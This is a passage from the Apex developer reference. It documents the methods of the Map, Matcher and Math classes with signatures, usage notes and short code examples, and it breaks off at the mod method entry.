Returns the hashcode corresponding to this map.
isEmpty()
Returns true if the map has zero key-value pairs.
keySet()
Returns a set that contains all of the keys in the map.
put(Object, Object)
Associates the specified value with the specified key in the map.
putAll(Map)
Copies all of the mappings from the specified map to the original map.
putAll(sObject[])
Adds the list of sObject records to a map declared as Map<ID, sObject> or Map<String, sObject>.
remove(Key)
Removes the mapping for the specified key from the map, if present, and returns the corresponding value.
size()
Returns the number of key-value pairs in the map.
values()
Returns a list that contains all of the values in the map in arbitrary order.
1571
Reference
Map Class
clear()
Removes all of the key-value mappings from the map.
Signature
public Void clear()
Return Value
Type: Void
clone()
Makes a duplicate copy of the map.
Signature
public Map<Object, Object> clone()
Return Value
Type: Map (of same type)
Usage
If this is a map with sObject record values, the duplicate map will only be a shallow copy of the map. That is, the duplicate will have
references to each sObject record, but the records themselves are not duplicated. For example:
To also copy the sObject records, you must use the deepClone method.
Example
Account a = new Account(
Name='Acme',
BillingCity='New York');
Map<Integer, Account> map1 =
new Map<Integer, Account> {};
map1.put(1, a);
Map<Integer, Account> map2 =
map1.clone();
map1.get(1).BillingCity =
'San Francisco';
System.assertEquals(
map1.get(1).BillingCity,
'San Francisco');
System.assertEquals(
map2.get(1).BillingCity,
'San Francisco');
1572
Reference
Map Class
containsKey(Object)
Returns true if the map contains a mapping for the specified key.
Signature
public Boolean containsKey(Object key)
Parameters
key
Type: Object
Return Value
Type: Boolean
Usage
If the key is a string, the key value is case-sensitive.
Example
Map<string, string> colorCodes =
new Map<String, String>();
colorCodes.put('Red', 'FF0000');
colorCodes.put('Blue', '0000A0');
Boolean contains =
colorCodes.containsKey('Blue');
System.assertEquals(contains, True);
deepClone()
Makes a duplicate copy of a map, including sObject records if this is a map with sObject record values.
Signature
public Map<Object, Object> deepClone()
Return Value
Type: Map (of the same type)
Usage
To make a shallow copy of a map without duplicating the sObject records it contains, use the clone() method.
1573
Reference
Map Class
Example
Account a = new Account(
Name='Acme',
BillingCity='New York');
Map<Integer, Account> map1 =
new Map<Integer, Account> {};
map1.put(1, a);
Map<Integer, Account> map2 =
map1.deepClone();
map1.get(1).BillingCity =
'San Francisco';
System.assertEquals(map1.get(1).
BillingCity, 'San Francisco');
System.assertEquals(map2.get(1).
BillingCity, 'New York');
equals(Map)
Compares this map with the specified map and returns true if both maps are equal; otherwise, returns false.
Signature
public Boolean equals(Map map2)
Parameters
map2
Type: Map
The map2 argument is the map to compare this map with.
Return Value
Type: Boolean
Usage
Two maps are equal if their key/value pairs are identical, regardless of the order of those pairs. The == operator is used to compare the
map keys and values.
The == operator is equivalent to calling the equals method, so you can call map1.equals(map2); instead of map1 ==
map2;.
get(Object)
Returns the value to which the specified key is mapped, or null if the map contains no value for this key.
1574
Reference
Map Class
Signature
public Object get(Object key)
Parameters
key
Type: Object
Return Value
Type: Object
Usage
If the key is a string, the key value is case-sensitive.
Example
Map<String, String> colorCodes =
new Map<String, String>();
colorCodes.put('Red', 'FF0000');
colorCodes.put('Blue', '0000A0');
String code =
colorCodes.get('Blue');
System.assertEquals(code, '0000A0');
// The following is not a color
// in the map
String code2 =
colorCodes.get('Magenta');
System.assertEquals(code2, null);
getSObjectType()
Returns the token of the sObject type that makes up the map values.
Signature
public Schema.SObjectType getSObjectType()
Return Value
Type: Schema.SObjectType
Usage
Use this method with describe information, to determine if a map contains sObjects of a particular type.
1575
Reference
Map Class
Note that this method can only be used with maps that have sObject values.
For more information, see Understanding Apex Describe Information on page 154.
Example
Account a = new Account(
Name='Acme');
insert a;
// Create a generic sObject
// variable s
SObject s = Database.query
('SELECT Id FROM Account ' +
'LIMIT 1');
// Verify if that sObject
// variable
// is an Account token
System.assertEquals(
s.getSObjectType(),
Account.sObjectType);
// Create a map of generic
// sObjects
Map<Integer, Account> M =
new Map<Integer, Account>();
// Verify if the list of sObjects
// contains Account tokens
System.assertEquals(
M.getSObjectType(),
Account.sObjectType);
hashCode()
Returns the hashcode corresponding to this map.
Signature
public Integer hashCode()
Return Value
Type: Integer
isEmpty()
Returns true if the map has zero key-value pairs.
Signature
public Boolean isEmpty()
1576
Reference
Map Class
Return Value
Type: Boolean
Example
Map<String, String> colorCodes =
new Map<String, String>();
Boolean empty = colorCodes.isEmpty();
system.assertEquals(empty, true);
keySet()
Returns a set that contains all of the keys in the map.
Signature
public Set<Object> keySet()
Return Value
Type: Set (of key type)
Example
Map<String, String> colorCodes =
new Map<String, String>();
colorCodes.put('Red', 'FF0000');
colorCodes.put('Blue', '0000A0');
Set <String> colorSet = new Set<String>();
colorSet = colorCodes.keySet();
put(Object, Object)
Associates the specified value with the specified key in the map.
Signature
public Object put(Object key, Object value)
Parameters
key
Type: Object
value
Type: Object
1577
Reference
Map Class
Return Value
Type: Object
Usage
If the map previously contained a mapping for this key, the old value is returned by the method and then replaced.
If the key is a string, the key value is case-sensitive.
Example
Map<String, String> colorCodes =
new Map<String, String>();
colorCodes.put('Red', 'ff0000');
colorCodes.put('Red', '#FF0000');
// Red is now #FF0000
putAll(Map)
Copies all of the mappings from the specified map to the original map.
Signature
public Void putAll(Map fromMap)
Parameters
fromMap
Type: Map
Return Value
Type: Void
Usage
The new mappings from fromMap replace any mappings that the original map had.
putAll(sObject[])
Adds the list of sObject records to a map declared as Map<ID, sObject> or Map<String, sObject>.
Signature
public putAll(sObject[] sobjectArray)
Parameters
sobjectArray
Type: sObject[]
1578
Reference
Map Class
Return Value
Type:
Usage
This method is similar to calling the Map constructor with the same input.
remove(Key)
Removes the mapping for the specified key from the map, if present, and returns the corresponding value.
Signature
public Object remove(Key key)
Parameters
key
Type: Key
Return Value
Type: Object
Usage
If the key is a string, the key value is case-sensitive.
Example
Map<String, String> colorCodes =
new Map<String, String>();
colorCodes.put('Red', 'FF0000');
colorCodes.put('Blue', '0000A0');
String myColor = colorCodes.remove('Blue');
String code2 =
colorCodes.get('Blue');
System.assertEquals(code2, null);
size()
Returns the number of key-value pairs in the map.
Signature
public Integer size()
1579
Reference
Matcher Class
Return Value
Type: Integer
Example
Map<String, String> colorCodes =
new Map<String, String>();
colorCodes.put('Red', 'FF0000');
colorCodes.put('Blue', '0000A0');
Integer mSize = colorCodes.size();
system.assertEquals(mSize, 2);
values()
Returns a list that contains all of the values in the map in arbitrary order.
Signature
public List<Object> values()
Return Value
Type: List<Object>
Example
Map<String, String> colorCodes =
new Map<String, String>();
colorCodes.put('Red', 'FF0000');
colorCodes.put('Blue', '0000A0');
List<String> colors = new List<String>();
colors = colorCodes.values();
Matcher Class
Matchers use Patterns to perform match operations on a character string.
Namespace
System
Matcher Methods
The following are methods for Matcher.
1580
Reference
Matcher Class
IN THIS SECTION:
end()
Returns the position after the last matched character.
end(Integer)
Returns the position after the last character of the subsequence captured by the group index during the previous match operation.
If the match was successful but the group itself did not match anything, this method returns -1.
find()
Attempts to find the next subsequence of the input sequence that matches the pattern. This method returns true if a subsequence
of the input sequence matches this Matcher object's pattern.
find(Integer)
Resets the Matcher object and then tries to find the next subsequence of the input sequence that matches the pattern. This method
returns true if a subsequence of the input sequence matches this Matcher object's pattern.
group()
Returns the input subsequence returned by the previous match.
group(Integer)
Returns the input subsequence captured by the specified group index during the previous match operation. If the match was
successful but the specified group failed to match any part of the input sequence, null is returned.
groupCount()
Returns the number of capturing groups in this Matching object's pattern. Group zero denotes the entire pattern and is not included
in this count.
hasAnchoringBounds()
Returns true if the Matcher object has anchoring bounds, false otherwise. By default, a Matcher object uses anchoring bounds regions.
hasTransparentBounds()
Returns true if the Matcher object has transparent bounds, false if it uses opaque bounds. By default, a Matcher object uses opaque
region boundaries.
hitEnd()
Returns true if the end of input was found by the search engine in the last match operation performed by this Matcher object. When
this method returns true, it is possible that more input would have changed the result of the last search.
lookingAt()
Attempts to match the input sequence, starting at the beginning of the region, against the pattern.
matches()
Attempts to match the entire region against the pattern.
pattern()
Returns the Pattern object from which this Matcher object was created.
quoteReplacement(String)
Returns a literal replacement string for the specified string inputString. The characters in the returned string match the sequence
of characters in inputString.
region(Integer, Integer)
Sets the limits of this Matcher object's region. The region is the part of the input sequence that is searched to find a match.
regionEnd()
Returns the end index (exclusive) of this Matcher object's region.
1581
Reference
Matcher Class
regionStart()
Returns the start index (inclusive) of this Matcher object's region.
replaceAll(String)
Replaces every subsequence of the input sequence that matches the pattern with the replacement string.
replaceFirst(String)
Replaces the first subsequence of the input sequence that matches the pattern with the replacement string.
requireEnd()
Returns true if more input could change a positive match into a negative one.
reset()
Resets this Matcher object. Resetting a Matcher object discards all of its explicit state information.
reset(String)
Resets this Matcher object with the new input sequence. Resetting a Matcher object discards all of its explicit state information.
start()
Returns the start index of the first character of the previous match.
start(Integer)
Returns the start index of the subsequence captured by the group specified by the group index during the previous match operation.
Captured groups are indexed from left to right, starting at one. Group zero denotes the entire pattern, so the expression m.start(0)
is equivalent to m.start().
useAnchoringBounds(Boolean)
Sets the anchoring bounds of the region for the Matcher object. By default, a Matcher object uses anchoring bounds regions.
usePattern(Pattern)
Changes the Pattern object that the Matcher object uses to find matches. This method causes the Matcher object to lose information
about the groups of the last match that occurred. The Matcher object's position in the input is maintained.
useTransparentBounds(Boolean)
Sets the transparency bounds for this Matcher object. By default, a Matcher object uses anchoring bounds regions.
end()
Returns the position after the last matched character.
Signature
public Integer end()
Return Value
Type: Integer
end(Integer)
Returns the position after the last character of the subsequence captured by the group index during the previous match operation. If
the match was successful but the group itself did not match anything, this method returns -1.
1582
Reference
Matcher Class
Signature
public Integer end(Integer groupIndex)
Parameters
groupIndex
Type: Integer
Return Value
Type: Integer
Usage
Captured groups are indexed from left to right, starting at one. Group zero denotes the entire pattern, so the expressionm.end(0) is
equivalent to m.end().
See Understanding Capturing Groups.
find()
Attempts to find the next subsequence of the input sequence that matches the pattern. This method returns true if a subsequence of
the input sequence matches this Matcher object's pattern.
Signature
public Boolean find()
Return Value
Type: Boolean
Usage
This method starts at the beginning of this Matcher object's region, or, if a previous invocation of the method was successful and the
Matcher object has not since been reset, at the first character not matched by the previous match.
If the match succeeds, more information can be obtained using the start, end, and group methods.
For more information, see Using Regions.
find(Integer)
Resets the Matcher object and then tries to find the next subsequence of the input sequence that matches the pattern. This method
returns true if a subsequence of the input sequence matches this Matcher object's pattern.
Signature
public Boolean find(Integer group)
1583
Reference
Matcher Class
Parameters
group
Type: Integer
Return Value
Type: Boolean
Usage
If the match succeeds, more information can be obtained using the start, end, and group methods.
group()
Returns the input subsequence returned by the previous match.
Signature
public String group()
Return Value
Type: String
Usage
Note that some groups, such as (a*), match the empty string. This method returns the empty string when such a group successfully
matches the empty string in the input.
group(Integer)
Returns the input subsequence captured by the specified group index during the previous match operation. If the match was successful
but the specified group failed to match any part of the input sequence, null is returned.
Signature
public String group(Integer groupIndex)
Parameters
groupIndex
Type: Integer
Return Value
Type: String
1584
Reference
Matcher Class
Usage
Captured groups are indexed from left to right, starting at one. Group zero denotes the entire pattern, so the expression m.group(0)
is equivalent to m.group().
Note that some groups, such as (a*), match the empty string. This method returns the empty string when such a group successfully
matches the empty string in the input.
See Understanding Capturing Groups.
groupCount()
Returns the number of capturing groups in this Matching object's pattern. Group zero denotes the entire pattern and is not included in
this count.
Signature
public Integer groupCount()
Return Value
Type: Integer
Usage
See Understanding Capturing Groups.
hasAnchoringBounds()
Returns true if the Matcher object has anchoring bounds, false otherwise. By default, a Matcher object uses anchoring bounds regions.
Signature
public Boolean hasAnchoringBounds()
Return Value
Type: Boolean
Usage
If a Matcher object uses anchoring bounds, the boundaries of this Matcher object's region match start and end of line anchors such as
^ and $.
For more information, see Using Bounds.
hasTransparentBounds()
Returns true if the Matcher object has transparent bounds, false if it uses opaque bounds. By default, a Matcher object uses opaque
region boundaries.
1585
Reference
Matcher Class
Signature
public Boolean hasTransparentBounds()
Return Value
Type: Boolean
Usage
For more information, see Using Bounds.
hitEnd()
Returns true if the end of input was found by the search engine in the last match operation performed by this Matcher object. When
this method returns true, it is possible that more input would have changed the result of the last search.
Signature
public Boolean hitEnd()
Return Value
Type: Boolean
lookingAt()
Attempts to match the input sequence, starting at the beginning of the region, against the pattern.
Signature
public Boolean lookingAt()
Return Value
Type: Boolean
Usage
Like the matches method, this method always starts at the beginning of the region; unlike that method, it does not require the entire
region be matched.
If the match succeeds, more information can be obtained using the start, end, and group methods.
See Using Regions.
matches()
Attempts to match the entire region against the pattern.
Signature
public Boolean matches()
1586
Reference
Matcher Class
Return Value
Type: Boolean
Usage
If the match succeeds, more information can be obtained using the start, end, and group methods.
See Using Regions.
pattern()
Returns the Pattern object from which this Matcher object was created.
Signature
public Pattern object pattern()
Return Value
Type: System.Pattern
quoteReplacement(String)
Returns a literal replacement string for the specified string inputString. The characters in the returned string match the sequence
of characters in inputString.
Signature
public static String quoteReplacement(String inputString)
Parameters
inputString
Type: String
Return Value
Type: String
Usage
Metacharacters (such as $ or ^) and escape sequences in the input string are treated as literal characters with no special meaning.
region(Integer, Integer)
Sets the limits of this Matcher object's region. The region is the part of the input sequence that is searched to find a match.
Signature
public Matcher object region(Integer start, Integer end)
1587
Reference
Matcher Class
Parameters
start
Type: Integer
end
Type: Integer
Return Value
Type: Matcher
Usage
This method first resets the Matcher object, then sets the region to start at the index specified by start and end at the index specified
by end.
Depending on the transparency boundaries being used, certain constructs such as anchors may behave differently at or around the
boundaries of the region.
See Using Regions and Using Bounds.
regionEnd()
Returns the end index (exclusive) of this Matcher object's region.
Signature
public Integer regionEnd()
Return Value
Type: Integer
Usage
See Using Regions.
regionStart()
Returns the start index (inclusive) of this Matcher object's region.
Signature
public Integer regionStart()
Return Value
Type: Integer
Usage
See Using Regions.
1588
Reference
Matcher Class
replaceAll(String)
Replaces every subsequence of the input sequence that matches the pattern with the replacement string.
Signature
public String replaceAll(String replacementString)
Parameters
replacementString
Type: String
Return Value
Type: String
Usage
This method first resets the Matcher object, then scans the input sequence looking for matches of the pattern. Characters that are not
part of any match are appended directly to the result string; each match is replaced in the result by the replacement string. The replacement
string may contain references to captured subsequences.
Note that backslashes (\) and dollar signs ($) in the replacement string may cause the results to be different than if the string was treated
as a literal replacement string. Dollar signs may be treated as references to captured subsequences, and backslashes are used to escape
literal characters in the replacement string.
Invoking this method changes this Matcher object's state. If the Matcher object is to be used in further matching operations it should
first be reset.
Given the regular expression a*b, the input "aabfooaabfooabfoob", and the replacement string "-", an invocation of this
method on a Matcher object for that expression would yield the string "-foo-foo-foo-".
replaceFirst(String)
Replaces the first subsequence of the input sequence that matches the pattern with the replacement string.
Signature
public String replaceFirst(String replacementString)
Parameters
replacementString
Type: String
Return Value
Type: String
1589
Reference
Matcher Class
Usage
Note that backslashes (\) and dollar signs ($) in the replacement string may cause the results to be different than if the string was treated
as a literal replacement string. Dollar signs may be treated as references to captured subsequences, and backslashes are used to escape
literal characters in the replacement string.
Invoking this method changes this Matcher object's state. If the Matcher object is to be used in further matching operations it should
first be reset.
Given the regular expression dog, the input "zzzdogzzzdogzzz", and the replacement string "cat", an invocation of this
method on a Matcher object for that expression would return the string "zzzcatzzzdogzzz".
requireEnd()
Returns true if more input could change a positive match into a negative one.
Signature
public Boolean requireEnd()
Return Value
Type: Boolean
Usage
If this method returns true, and a match was found, then more input could cause the match to be lost.
If this method returns false and a match was found, then more input might change the match but the match won't be lost.
If a match was not found, then requireEnd has no meaning.
reset()
Resets this Matcher object. Resetting a Matcher object discards all of its explicit state information.
Signature
public Matcher object reset()
Return Value
Type: Matcher
Usage
This method does not change whether the Matcher object uses anchoring bounds. You must explicitly use the useAnchoringBounds
method to change the anchoring bounds.
For more information, see Using Bounds.
reset(String)
Resets this Matcher object with the new input sequence. Resetting a Matcher object discards all of its explicit state information.
1590
Reference
Matcher Class
Signature
public Matcher reset(String inputSequence)
Parameters
inputSequence
Type: String
Return Value
Type: Matcher
start()
Returns the start index of the first character of the previous match.
Signature
public Integer start()
Return Value
Type: Integer
start(Integer)
Returns the start index of the subsequence captured by the group specified by the group index during the previous match operation.
Captured groups are indexed from left to right, starting at one. Group zero denotes the entire pattern, so the expression m.start(0)
is equivalent to m.start().
Signature
public Integer start(Integer groupIndex)
Parameters
groupIndex
Type: Integer
Return Value
Type: Integer
Usage
See Understanding Capturing Groups on page 377.
useAnchoringBounds(Boolean)
Sets the anchoring bounds of the region for the Matcher object. By default, a Matcher object uses anchoring bounds regions.
1591
Reference
Matcher Class
Signature
public Matcher object useAnchoringBounds(Boolean anchoringBounds)
Parameters
anchoringBounds
Type: Boolean
If you specify true, the Matcher object uses anchoring bounds. If you specify false, non-anchoring bounds are used.
Return Value
Type: Matcher
Usage
If a Matcher object uses anchoring bounds, the boundaries of this Matcher object's region match start and end of line anchors such as
^ and $.
For more information, see Using Bounds on page 376.
usePattern(Pattern)
Changes the Pattern object that the Matcher object uses to find matches. This method causes the Matcher object to lose information
about the groups of the last match that occurred. The Matcher object's position in the input is maintained.
Signature
public Matcher object usePattern(Pattern pattern)
Parameters
pattern
Type: System.Pattern
Return Value
Type: Matcher
useTransparentBounds(Boolean)
Sets the transparency bounds for this Matcher object. By default, a Matcher object uses anchoring bounds regions.
Signature
public Matcher object useTransparentBounds(Boolean transparentBounds)
Parameters
transparentBounds
Type: Boolean
1592
Reference
Math Class
If you specify true, the Matcher object uses transparent bounds. If you specify false, opaque bounds are used.
Return Value
Type: Matcher
Usage
For more information, see Using Bounds.
Math Class
Contains methods for mathematical operations.
Namespace
System
Math Fields
The following are fields for Math.
IN THIS SECTION:
E
Returns the mathematical constant e, which is the base of natural logarithms.
PI
Returns the mathematical constant pi, which is the ratio of the circumference of a circle to its diameter.
E
Returns the mathematical constant e, which is the base of natural logarithms.
Signature
public static final Double E
Property Value
Type: Double
PI
Returns the mathematical constant pi, which is the ratio of the circumference of a circle to its diameter.
Signature
public static final Double PI
1593
Reference
Math Class
Property Value
Type: Double
Math Methods
The following are methods for Math. All methods are static.
IN THIS SECTION:
abs(Decimal)
Returns the absolute value of the specified Decimal.
abs(Double)
Returns the absolute value of the specified Double.
abs(Integer)
Returns the absolute value of the specified Integer.
abs(Long)
Returns the absolute value of the specified Long.
acos(Decimal)
Returns the arc cosine of an angle, in the range of 0.0 through pi.
acos(Double)
Returns the arc cosine of an angle, in the range of 0.0 through pi.
asin(Decimal)
Returns the arc sine of an angle, in the range of -pi/2 through pi/2.
asin(Double)
Returns the arc sine of an angle, in the range of -pi/2 through pi/2.
atan(Decimal)
Returns the arc tangent of an angle, in the range of -pi/2 through pi/2.
atan(Double)
Returns the arc tangent of an angle, in the range of -pi/2 through pi/2.
atan2(Decimal, Decimal)
Converts rectangular coordinates (x and y) to polar (r and theta). This method computes the phase theta by computing an
arc tangent of x/y in the range of -pi to pi.
atan2(Double, Double)
Converts rectangular coordinates (x and y) to polar (r and theta). This method computes the phase theta by computing an
arc tangent of x/y in the range of -pi to pi.
cbrt(Decimal)
Returns the cube root of the specified Decimal. The cube root of a negative value is the negative of the cube root of that value's
magnitude.
cbrt(Double)
Returns the cube root of the specified Double. The cube root of a negative value is the negative of the cube root of that value's
magnitude.
1594
Reference
Math Class
ceil(Decimal)
Returns the smallest (closest to negative infinity) Decimal that is not less than the argument and is equal to a mathematical integer.
ceil(Double)
Returns the smallest (closest to negative infinity) Double that is not less than the argument and is equal to a mathematical integer.
cos(Decimal)
Returns the trigonometric cosine of the angle specified by d.
cos(Double)
Returns the trigonometric cosine of the angle specified by d.
cosh(Decimal)
Returns the hyperbolic cosine of d. The hyperbolic cosine of d is defined to be (ex + e-x)/2 where e is Euler's number.
cosh(Double)
Returns the hyperbolic cosine of d. The hyperbolic cosine of d is defined to be (ex + e-x)/2 where e is Euler's number.
exp(Decimal)
Returns Euler's number e raised to the power of the specified Decimal.
exp(Double)
Returns Euler's number e raised to the power of the specified Double.
floor(Decimal)
Returns the largest (closest to positive infinity) Decimal that is not greater than the argument and is equal to a mathematical integer.
floor(Double)
Returns the largest (closest to positive infinity) Double that is not greater than the argument and is equal to a mathematical integer.
log(Decimal)
Returns the natural logarithm (base e) of the specified Decimal.
log(Double)
Returns the natural logarithm (base e) of the specified Double.
log10(Decimal)
Returns the logarithm (base 10) of the specified Decimal.
log10(Double)
Returns the logarithm (base 10) of the specified Double.
max(Decimal, Decimal)
Returns the larger of the two specified Decimals.
max(Double, Double)
Returns the larger of the two specified Doubles.
max(Integer, Integer)
Returns the larger of the two specified Integers.
max(Long, Long)
Returns the larger of the two specified Longs.
min(Decimal, Decimal)
Returns the smaller of the two specified Decimals.
min(Double, Double)
Returns the smaller of the two specified Doubles.
1595
Reference
Math Class
min(Integer, Integer)
Returns the smaller of the two specified Integers.
min(Long, Long)
Returns the smaller of the two specified Longs.
mod(Integer, Integer)
Returns the remainder of i1 divided by i2.
mod(Long, Long)
Returns the remainder of L1 divided by L2.
pow(Double, Double)
Returns the value of the first Double raised to the power of exp.
random()
Returns a positive Double that is greater than or equal to 0.0 and less than 1.0.
rint(Decimal)
Returns the value that is closest in value to d and is equal to a mathematical integer.
rint(Double)
Returns the value that is closest in value to d and is equal to a mathematical integer.
round(Double)
Do not use. This method is deprecated as of the Winter '08 release. Instead, use Math.roundToLong. Returns the closest Integer
to the specified Double. If the result is less than -2,147,483,648 or greater than 2,147,483,647, Apex generates an error.
round(Decimal)
Returns the rounded approximation of this Decimal. The number is rounded to zero decimal places using half-even rounding mode,
that is, it rounds towards the nearest neighbor unless both neighbors are equidistant, in which case, this mode rounds towards
the even neighbor.
roundToLong(Decimal)
Returns the rounded approximation of this Decimal. The number is rounded to zero decimal places using half-even rounding mode,
that is, it rounds towards the nearest neighbor unless both neighbors are equidistant, in which case, this mode rounds towards
the even neighbor.
roundToLong(Double)
Returns the closest Long to the specified Double.
signum(Decimal)
Returns the signum function of the specified Decimal, which is 0 if d is 0, 1.0 if d is greater than 0, -1.0 if d is less than 0.
signum(Double)
Returns the signum function of the specified Double, which is 0 if d is 0, 1.0 if d is greater than 0, -1.0 if d is less than 0.
sin(Decimal)
Returns the trigonometric sine of the angle specified by d.
sin(Double)
Returns the trigonometric sine of the angle specified by d.
sinh(Decimal)
Returns the hyperbolic sine of d. The hyperbolic sine of d is defined to be (ex - e-x)/2 where e is Euler's number.
sinh(Double)
Returns the hyperbolic sine of d. The hyperbolic sine of d is defined to be (ex - e-x)/2 where e is Euler's number.
1596
Reference
Math Class
sqrt(Decimal)
Returns the correctly rounded positive square root of d.
sqrt(Double)
Returns the correctly rounded positive square root of d.
tan(Decimal)
Returns the trigonometric tangent of the angle specified by d.
tan(Double)
Returns the trigonometric tangent of the angle specified by d.
tanh(Decimal)
Returns the hyperbolic tangent of d. The hyperbolic tangent of d is defined to be (ex - e-x)/(ex + e-x) where e is Euler's number. In
other words, it is equivalent to sinh(x)/cosinh(x). The absolute value of the exact tanh is always less than 1.
tanh(Double)
Returns the hyperbolic tangent of d. The hyperbolic tangent of d is defined to be (ex - e-x)/(ex + e-x) where e is Euler's number. In
other words, it is equivalent to sinh(x)/cosinh(x). The absolute value of the exact tanh is always less than 1.
abs(Decimal)
Returns the absolute value of the specified Decimal.
Signature
public static Decimal abs(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
abs(Double)
Returns the absolute value of the specified Double.
Signature
public static Double abs(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
1597
Reference
Math Class
abs(Integer)
Returns the absolute value of the specified Integer.
Signature
public static Integer abs(Integer i)
Parameters
i
Type: Integer
Return Value
Type: Integer
Example
Integer i = -42;
Integer i2 = math.abs(i);
system.assertEquals(i2, 42);
abs(Long)
Returns the absolute value of the specified Long.
Signature
public static Long abs(Long l)
Parameters
l
Type: Long
Return Value
Type: Long
acos(Decimal)
Returns the arc cosine of an angle, in the range of 0.0 through pi.
Signature
public static Decimal acos(Decimal d)
1598
Reference
Math Class
Parameters
d
Type: Decimal
Return Value
Type: Decimal
acos(Double)
Returns the arc cosine of an angle, in the range of 0.0 through pi.
Signature
public static Double acos(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
asin(Decimal)
Returns the arc sine of an angle, in the range of -pi/2 through pi/2.
Signature
public static Decimal asin(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
asin(Double)
Returns the arc sine of an angle, in the range of -pi/2 through pi/2.
Signature
public static Double asin(Double d)
1599
Reference
Math Class
Parameters
d
Type: Double
Return Value
Type: Double
atan(Decimal)
Returns the arc tangent of an angle, in the range of -pi/2 through pi/2.
Signature
public static Decimal atan(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
atan(Double)
Returns the arc tangent of an angle, in the range of -pi/2 through pi/2.
Signature
public static Double atan(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
atan2(Decimal, Decimal)
Converts rectangular coordinates (x and y) to polar (r and theta). This method computes the phase theta by computing an arc
tangent of x/y in the range of -pi to pi.
Signature
public static Decimal atan2(Decimal x, Decimal y)
1600
Reference
Math Class
Parameters
x
Type: Decimal
y
Type: Decimal
Return Value
Type: Decimal
atan2(Double, Double)
Converts rectangular coordinates (x and y) to polar (r and theta). This method computes the phase theta by computing an arc
tangent of x/y in the range of -pi to pi.
Signature
public static Double atan2(Double x, Double y)
Parameters
x
Type: Double
y
Type: Double
Return Value
Type: Double
cbrt(Decimal)
Returns the cube root of the specified Decimal. The cube root of a negative value is the negative of the cube root of that value's magnitude.
Signature
public static Decimal cbrt(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
1601
Reference
Math Class
cbrt(Double)
Returns the cube root of the specified Double. The cube root of a negative value is the negative of the cube root of that value's magnitude.
Signature
public static Double cbrt(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
ceil(Decimal)
Returns the smallest (closest to negative infinity) Decimal that is not less than the argument and is equal to a mathematical integer.
Signature
public static Decimal ceil(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
ceil(Double)
Returns the smallest (closest to negative infinity) Double that is not less than the argument and is equal to a mathematical integer.
Signature
public static Double ceil(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
1602
Reference
Math Class
cos(Decimal)
Returns the trigonometric cosine of the angle specified by d.
Signature
public static Decimal cos(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
cos(Double)
Returns the trigonometric cosine of the angle specified by d.
Signature
public static Double cos(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
cosh(Decimal)
Returns the hyperbolic cosine of d. The hyperbolic cosine of d is defined to be (ex + e-x)/2 where e is Euler's number.
Signature
public static Decimal cosh(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
1603
Reference
Math Class
cosh(Double)
Returns the hyperbolic cosine of d. The hyperbolic cosine of d is defined to be (ex + e-x)/2 where e is Euler's number.
Signature
public static Double cosh(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
exp(Decimal)
Returns Euler's number e raised to the power of the specified Decimal.
Signature
public static Decimal exp(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
exp(Double)
Returns Euler's number e raised to the power of the specified Double.
Signature
public static Double exp(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
1604
Reference
Math Class
floor(Decimal)
Returns the largest (closest to positive infinity) Decimal that is not greater than the argument and is equal to a mathematical integer.
Signature
public static Decimal floor(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
floor(Double)
Returns the largest (closest to positive infinity) Double that is not greater than the argument and is equal to a mathematical integer.
Signature
public static Double floor(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
log(Decimal)
Returns the natural logarithm (base e) of the specified Decimal.
Signature
public static Decimal log(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
1605
Reference
Math Class
log(Double)
Returns the natural logarithm (base e) of the specified Double.
Signature
public static Double log(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
log10(Decimal)
Returns the logarithm (base 10) of the specified Decimal.
Signature
public static Decimal log10(Decimal d)
Parameters
d
Type: Decimal
Return Value
Type: Decimal
log10(Double)
Returns the logarithm (base 10) of the specified Double.
Signature
public static Double log10(Double d)
Parameters
d
Type: Double
Return Value
Type: Double
1606
Reference
Math Class
max(Decimal, Decimal)
Returns the larger of the two specified Decimals.
Signature
public static Decimal max(Decimal d1, Decimal d2)
Parameters
d1
Type: Decimal
d2
Type: Decimal
Return Value
Type: Decimal
Example
Decimal larger = math.max(12.3, 156.6);
system.assertEquals(larger, 156.6);
max(Double, Double)
Returns the larger of the two specified Doubles.
Signature
public static Double max(Double d1, Double d2)
Parameters
d1
Type: Double
d2
Type: Double
Return Value
Type: Double
max(Integer, Integer)
Returns the larger of the two specified Integers.
Signature
public static Integer max(Integer i1, Integer i2)
1607
Reference
Math Class
Parameters
i1
Type: Integer
i2
Type: Integer
Return Value
Type: Integer
max(Long, Long)
Returns the larger of the two specified Longs.
Signature
public static Long max(Long l1, Long l2)
Parameters
l1
Type: Long
l2
Type: Long
Return Value
Type: Long
min(Decimal, Decimal)
Returns the smaller of the two specified Decimals.
Signature
public static Decimal min(Decimal d1, Decimal d2)
Parameters
d1
Type: Decimal
d2
Type: Decimal
Return Value
Type: Decimal
1608
Reference
Math Class
Example
Decimal smaller = math.min(12.3, 156.6);
system.assertEquals(smaller, 12.3);
min(Double, Double)
Returns the smaller of the two specified Doubles.
Signature
public static Double min(Double d1, Double d2)
Parameters
d1
Type: Double
d2
Type: Double
Return Value
Type: Double
min(Integer, Integer)
Returns the smaller of the two specified Integers.
Signature
public static Integer min(Integer i1, Integer i2)
Parameters
i1
Type: Integer
i2
Type: Integer
Return Value
Type: Integer
min(Long, Long)
Returns the smaller of the two specified Longs.
Signature
public static Long min(Long l1, Long l2)
1609
Reference
Math Class
Parameters
l1
Type: Long
l2
Type: Long
Return Value
Type: Long
mod(Integer, Integer)
Returns the remainder of i1 divided by i2.
Signature
